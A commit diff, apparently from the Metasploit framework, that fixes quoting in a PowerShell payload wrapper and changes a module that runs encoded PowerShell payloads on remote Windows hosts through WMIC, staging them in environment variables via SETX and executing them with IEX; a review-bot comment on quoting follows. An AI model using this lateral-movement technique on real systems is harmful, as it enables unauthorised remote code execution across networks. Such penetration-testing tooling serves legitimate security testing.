Correct powershell

bug/bundler_fix
Meatballs 2013-09-20 18:36:24 +01:00
parent 9819566d94
commit 7d1c5c732a
2 changed files with 15 additions and 24 deletions


@ -116,7 +116,7 @@ module Exploit::Powershell
ps_wrapper = <<EOS ps_wrapper = <<EOS
$si = New-Object System.Diagnostics.ProcessStartInfo $si = New-Object System.Diagnostics.ProcessStartInfo
$si.FileName = '#{ps_bin}' $si.FileName = #{ps_bin}
$si.Arguments = '#{ps_args}' $si.Arguments = '#{ps_args}'
$si.UseShellExecute = $false $si.UseShellExecute = $false
$si.RedirectStandardOutput = $true $si.RedirectStandardOutput = $true
@ -146,7 +146,7 @@ EOS
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};" psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
end end
# Determine appropriate architecture # Determine appropriate architecture
ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe' ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
# Wrap in hidden runtime # Wrap in hidden runtime
psh_payload = run_hidden_psh(psh_payload,ps_bin) psh_payload = run_hidden_psh(psh_payload,ps_bin)
# Convert to base64 for -encodedcommand execution # Convert to base64 for -encodedcommand execution
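Review bot: `ps_bin` changes meaning in this file without a comment recording it: the heredoc in the first hunk now interpolates it unquoted (`$si.FileName = #{ps_bin}`), so the value assigned in the second hunk must be a complete PowerShell expression that carries its own quotes. Any other caller of `run_hidden_psh` that still passes a bare path would produce a script that no longer parses; whether such callers exist is not visible from this page. A comment above the assignment, such as `# ps_bin is a PowerShell expression (quotes included); run_hidden_psh interpolates it verbatim`, would document the contract, and writing the two literals with `%q{...}` instead of `\'` escapes would make the embedded quotes easier to read. Both `run_hidden_psh` and the method containing the `ps_bin` assignment begin outside the hunks shown.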


@ -20,7 +20,8 @@ class Metasploit3 < Msf::Exploit::Local
This module executes powershell on the remote host using the current This module executes powershell on the remote host using the current
user credentials or those supplied. Instead of using PSEXEC over TCP user credentials or those supplied. Instead of using PSEXEC over TCP
port 445 we use the WMIC command to start a Remote Procedure Call on port 445 we use the WMIC command to start a Remote Procedure Call on
TCP port 135 and an ephemeral port. TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
traffic through that session.
The result is similar to psexec but with the added benefit of using The result is similar to psexec but with the added benefit of using
the session's current authentication token instead of having to know the session's current authentication token instead of having to know
@ -29,6 +30,9 @@ class Metasploit3 < Msf::Exploit::Local
We do not get feedback from the WMIC command so there are no We do not get feedback from the WMIC command so there are no
indicators of success or failure. The remote host must be configured indicators of success or failure. The remote host must be configured
to allow remote Windows Management Instrumentation. to allow remote Windows Management Instrumentation.
N.B. This module will not work with the local administrator account
due to the way the environment variables are stored as SYSTEM acc.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Author' => [
@ -61,6 +65,8 @@ class Metasploit3 < Msf::Exploit::Local
OptString.new('SMBPass', [ false, 'The password for the specified username' ]), OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]), OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]),
OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]), OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
# Move this out of advanced
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
]) ])
end end
@ -70,6 +76,10 @@ class Metasploit3 < Msf::Exploit::Local
end end
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server| Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
# TODO: CHECK WMIC Access by reading the clipboard?
# TODO: wmic /output:clipboard
# TODO: Needs to be meterpreter ext side due to threading
# Get the PSH Payload and split it into bitesize chunks # Get the PSH Payload and split it into bitesize chunks
# 1024 appears to be the max value allowed in env vars # 1024 appears to be the max value allowed in env vars
psh = cmd_psh_payload(payload.encoded).gsub("\r\n","") psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
@ -81,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Local
env_vars = [] env_vars = []
0.upto(chunks.length-1) do |i| 0.upto(chunks.length-1) do |i|
env_vars << "#{env_name}#{i}" env_vars << "#{env_name}#{i}"
c = "cmd /c SETX #{setx_user_pass_string}#{env_vars[i]} \"#{chunks[i]}\"" c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\""
wmic_command(server, c) wmic_command(server, c)
end end
@ -89,12 +99,10 @@ class Metasploit3 < Msf::Exploit::Local
env_vars.each do |env| env_vars.each do |env|
exec_cmd << "+$env:#{env}" exec_cmd << "+$env:#{env}"
end end
exec_cmd << ";$x >> c:\\parp.txt;IEX $x;" exec_cmd << ";IEX $x;"
print_status("[#{server}] Executing payload") print_status("[#{server}] Executing payload")
sleep(10)
wmic_command(server, exec_cmd) wmic_command(server, exec_cmd)
sleep(10)
print_status("[#{server}] Cleaning up environment variables") print_status("[#{server}] Cleaning up environment variables")
env_vars.each do |env| env_vars.each do |env|
@ -104,23 +112,6 @@ class Metasploit3 < Msf::Exploit::Local
end end
end end
# If we are local administrator then environment variables are stored as
# SYSTEM in S-1-5-18 instead of the Administrator -500 HKCU store so we
# need to ensure we set the env vars for the current user!
def setx_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
userpass = ""
unless user.nil?
if domain.nil?
userpass = "/s 127.0.0.1 /u #{user} /p #{pass} "
else
userpass = "/s 127.0.0.1 /u #{domain}\\#{user} /p #{pass} "
end
end
return userpass
end
def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass']) def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
userpass = "" userpass = ""